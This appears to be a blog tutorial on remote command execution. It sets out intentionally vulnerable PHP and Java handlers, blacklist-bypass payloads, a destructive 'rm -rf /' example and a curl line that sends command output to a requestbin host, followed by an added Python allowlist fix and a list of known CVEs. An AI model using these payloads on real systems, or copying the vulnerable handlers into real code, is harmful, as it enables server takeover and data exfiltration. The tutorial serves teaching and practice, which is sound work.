Principles of remote command execution vulnerabilities and protection bypass methods

1. Background

RCE (Remote Command/Code Execution) is a remote code execution vulnerability: through PHP code injection, Java code injection and similar means, an attacker reaches a backdoor or interface reserved in the program and executes commands remotely, thereby gaining control of the server.
Why do remote code execution vulnerabilities occur?
Web applications sometimes need to call system command functions. For example, if a user is allowed to enter a command through a web page to test whether the system can reach www.xxx.com, the web application may call the operating system's "ping" command underneath. If the web program does not filter the command entered by the user, a system command execution vulnerability is very likely.

Remote management tools also need to execute system commands: we usually use remote management tools to connect to servers for remote administration and to control server software. If these tools have vulnerabilities, an attacker can exploit them to execute remote commands and gain control of the target system.

2. Principle of remote command execution

2.1 Remote command execution without filtering

Remote command execution means that a user submits a command through a browser or another remote channel, and because the server side does not filter the input before handing it to the execution function, the malicious command is executed.
For example, let's demonstrate the remote code execution vulnerability in Java code:

import java.io.IOException;
import java.util.Scanner;

public class CommandRunner {

    public static void main(String[] args) throws IOException {
        Scanner scanner = new Scanner(System.in);
        String command = scanner.nextLine();
        Runtime.getRuntime().exec(command); // potential remote code execution vulnerability
    }
}

In the above code, the program uses the Scanner class to obtain the command entered by the user and the exec() method of the Runtime class to execute it. This is a potential remote code execution vulnerability: if the application does not properly validate and sanitize user input, an attacker can execute arbitrary code by entering malicious commands.

For example, if the user enters ls -a, the program executes ls -a and lists all files and folders in the directory. However, if the user enters rm -rf /, the program performs a recursive deletion from the root directory, which may destroy system data.

In systems developed in PHP, which is common on the Web, if PHP's dangerous functions and constructs (system, exec, shell_exec, passthru, popen, the backtick operator ``, eval, assert, preg_replace, call_user_func, array_map, dynamic function calls) are used on user-controlled data, an attacker can construct strings or PHP code that reach these functions, execute system commands through them, and control the server.

2.2 Bypassing filtering

This is where command chaining comes in. First, understand how several commands can be executed on one line. Taking a Linux system as an example:

Symbol   Example   Explanation
;        A;B       B is executed regardless of whether A succeeded.
&        A&B       A is executed in the background; A and B run simultaneously.
&&       A&&B      B is executed only after A has succeeded.

Secondly, commands to view and execute files in Linux (shown as an image in the original post).
Common viewing commands (shown as an image in the original post).

If a key string is intercepted, how can it be bypassed?
Spaces are filtered:
%09 (URL encoding of the tab key) or ${IFS} in place of the space.

A string is filtered:
Use wildcards: * (any string of any length), ? (any single character), [] (any one character from the set).
For example, to view the flag file when the string "flag" is filtered, the following bypasses work:
cat [e-g]lag
cat *lag
cat ?lag

Command separators: ; | || & && (if one of them is filtered, another may still be available).

cat is filtered:
tac nl more ...

Filter spaces:
%09 (URL encoding of the tab key), ${IFS}, $IFS$9, <

Filter a string:
Wildcards: f* fla? [e-g]la[a-g]
Encoding: cat flag.php Base64-encoded is Y2F0IGZsYWcucGhw, so the command can be run as echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
Quoting and escaping: fl''ag fl""ag f\lag

3. Remote command execution example

Next, we use PHP functions to demonstrate remote command execution vulnerabilities.

3.1 Remote execution function without any filtering

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c);   // user input is passed straight to the shell
}
?>

This example has no interception at all and executes any Linux command passed in through the URL.

3.2 No execution result is returned

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");   // output is discarded, but the command still runs
}else{
    highlight_file(__FILE__);
}

The main point is that the c command can still be constructed and is run through system, but note that if you pass ?c=ls directly it becomes ls >/dev/null 2>&1, so the execution result is not displayed. What to do? Chain a second command: ?c=ls;pwd becomes ls;pwd >/dev/null 2>&1, which sends only the pwd output to /dev/null while ls runs and echoes normally.

3.3 Filter special characters

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

This one filters the input command c: it may not contain a semicolon ; (you can separate commands with || instead, or with &, which must be URL-encoded as %26 when passed in the URL) or cat (use tac or ca\t, etc.). Otherwise the principle is the same as above: ?c=ls||pwd lists all files, and since cat cannot be used, tac prints flag.php in reverse line order.


<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }else{
        echo 'error!';
    }
}else{
    highlight_file(__FILE__);
}

The principle is the same as above, but here the flag keyword is filtered too, so tac flag.php will not be executed. A wildcard works instead: tac fla*.php

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

The principle is the same as above, but spaces are filtered here as well; $IFS$9 can be used in place of the space.

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Same as above, but this one additionally filters digits, $ and the * wildcard (the ? wildcard can still be used). The bypass used is c=tac<>?lag.php||pwd

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "\n".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

This challenge filters many keywords. It can be bypassed with ?c=ca\t${IFS}fl?g.php; because this snippet does not discard the output, no command connector is needed.

This is the Ping function (command execution vulnerability module) of the pikachu practice range, which tests a domain name or IP. Through information gathering we learned the filter conditions it applies to the command:
/?ip=
PING 1.1.1.1 (1.1.1.1): 56 data bytes
<?php
// The opening lines of this snippet are cut off in the original post; the isset
// check and the first preg_match are restored from the pattern echoed below.
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "\n";
  print_r($a);
}
?>

Code analysis shows that wildcards and space encodings are filtered, and the regex /.*f.*l.*a.*g.*/ rejects any input containing the letters f, l, a, g in that order, so the filename can be written neither directly nor with wildcards; braces are filtered as well (see the regex above). Instead, shell variables can be used: construct two variables a and b, for example ?ip=1.1.1.1;b=ag;a=fl;cat$IFS$9$a$b.php
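The four blacklists from section 3.3 above, checked against the bypass inputs this page gives for them, beside the allowlist and no-shell argument vector that fix both the Java handler in 2.1 and the PHP ping handlers in section 3. This is an added Python example, not code from the original post; PAGE_CASES, TARGET_RE, audit, build_ping_argv and run_ping are assumed names, and the Python re transcriptions of the PHP preg_match patterns are mine.

```python
import re
import subprocess

# Each entry pairs the blacklist from one section 3.3 snippet (a PHP preg_match
# with /i, transcribed to Python re) with the bypass input the page gives for it.
PAGE_CASES = {
    "3.3 ;|cat":             (r";|cat", "ls||pwd"),
    "3.3 +flag":             (r";|cat|flag", "tac fla*.php"),
    "3.3 +space/digit/$/*":  (r";|cat|flag| |[0-9]|\$|\*", "tac<>?lag.php||pwd"),
    "3.3 long list":         (r";|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail"
                              r"|sed|cut|tac|awk|strings|od|curl|`|%|\x09|\x26|>|<",
                              r"ca\t${IFS}fl?g.php"),
}

# Allowlist for the ping feature of section 1: exactly one IPv4 address or one
# dotted hostname, nothing else (assumed policy, not from the original post).
TARGET_RE = re.compile(
    r"^(?:(?:\d{1,3}\.){3}\d{1,3}"
    r"|[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)$",
    re.I)

def blacklist_passes(pattern, user_input):
    """True when the blacklist does not match, i.e. the input reaches system()."""
    return re.search(pattern, user_input, re.I) is None

def allowlist_passes(user_input):
    """True only for a bare host; every metacharacter used on this page is rejected."""
    return len(user_input) <= 253 and TARGET_RE.fullmatch(user_input) is not None

def audit():
    """Per page case: (blacklist let the bypass through?, allowlist let it through?)."""
    return {name: (blacklist_passes(pat, payload), allowlist_passes(payload))
            for name, (pat, payload) in PAGE_CASES.items()}

def build_ping_argv(target):
    """Fixed handler: validated target, argv list, no shell parsing at all."""
    if not allowlist_passes(target):
        raise ValueError("target must be a plain IPv4 address or hostname")
    return ["ping", "-c", "4", target]

def run_ping(target):
    # Replacement for shell_exec("ping -c 4 ".$ip): the list form never goes
    # through /bin/sh, so ; | & $IFS and wildcards are only literal bytes.
    return subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=30).stdout
```

audit() returns (True, False) for every case: each bypass reaches system() under its blacklist and is rejected by the allowlist.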

3.4 There is no echo when executing the command

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    exec($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

This snippet uses exec to perform the remote command execution, and the execution result is not echoed. What if you want to read a specific file such as flag? Consider writing the result to another file and then requesting that file separately (provided the system grants write permission), or sending the data out of band.
For example, to write to another file: cat flag.php > 123.txt writes the result into 123.txt; likewise ?c=ls > 123.txt writes the directory listing into 123.txt, which can then be requested to obtain the content.
For out-of-band exfiltration, a request-logging service such as https://requestbin.net/ can receive the data, but GET parameters have a length limit: ?c=curl http://http.requestbin.buuoj.cn/xxx?c=ls|sed -n "1,5p"|base64 sends only lines 1 to 5 of the result, Base64-encoded.

4. Typical cases

Remote command execution vulnerabilities are particularly harmful. Remote execution vulnerabilities that have been disclosed include:
Log4j command execution (CVE-2017-5645): a deserialization command execution vulnerability in the Apache Log4j server component that allows an attacker to execute commands remotely by sending a crafted request, compromising the security of the server.

Apache Struts vulnerability (CVE-2017-5638): This is a very famous RCE vulnerability affecting the Apache Struts framework. An attacker could exploit it by sending a malicious HTTP request to execute arbitrary code and gain control of the server. This vulnerability was widely exploited and resulted in multiple large-scale data breaches.

Microsoft Windows SMB Vulnerability (MS17-010): This is an RCE vulnerability affecting the Microsoft Windows operating system. An attacker could exploit this vulnerability to execute arbitrary code on the remote system by sending a specially crafted SMB request. This vulnerability was used to spread the WannaCry ransomware, causing large-scale attacks and data loss worldwide.

Drupal Vulnerability (CVE-2018-7600): This is an RCE vulnerability affecting the Drupal content management system. An attacker could exploit this vulnerability to execute arbitrary code and gain control of the website server by sending specially crafted requests. This vulnerability was widely exploited, resulting in many Drupal websites being hacked and manipulated.

Apache Tomcat Vulnerability (CVE-2020-1938): This is an RCE vulnerability affecting the Apache Tomcat server. An attacker could exploit this vulnerability to execute arbitrary code and gain control of the server by sending specially crafted requests. This vulnerability is known as "Ghostcat" and affects many Tomcat servers.

Jenkins Vulnerability (CVE-2018-1000861): This is an RCE vulnerability affecting the Jenkins continuous integration tool. An attacker could exploit this vulnerability to execute arbitrary code on an affected Jenkins server by sending a specially crafted request. This vulnerability was widely exploited, resulting in many Jenkins servers being compromised and abused.

5. Summary

Today I shared the principles of remote command execution and how remote command execution vulnerabilities are exploited and their filters bypassed. These vulnerabilities are particularly harmful: attackers can use them to cause serious problems for the operations team. Some of the dangers include inheriting the permissions of the web service process to execute system commands or read and write files, spawning reverse shells, taking control of the entire website or even the server, and pivoting further into the intranet. For defense, strengthen the validation of user input, for instance by restricting what may be entered; secondly, follow the principle of least privilege and run the program with the minimum permissions it needs.

Origin blog.csdn.net/Scalzdp/article/details/134503083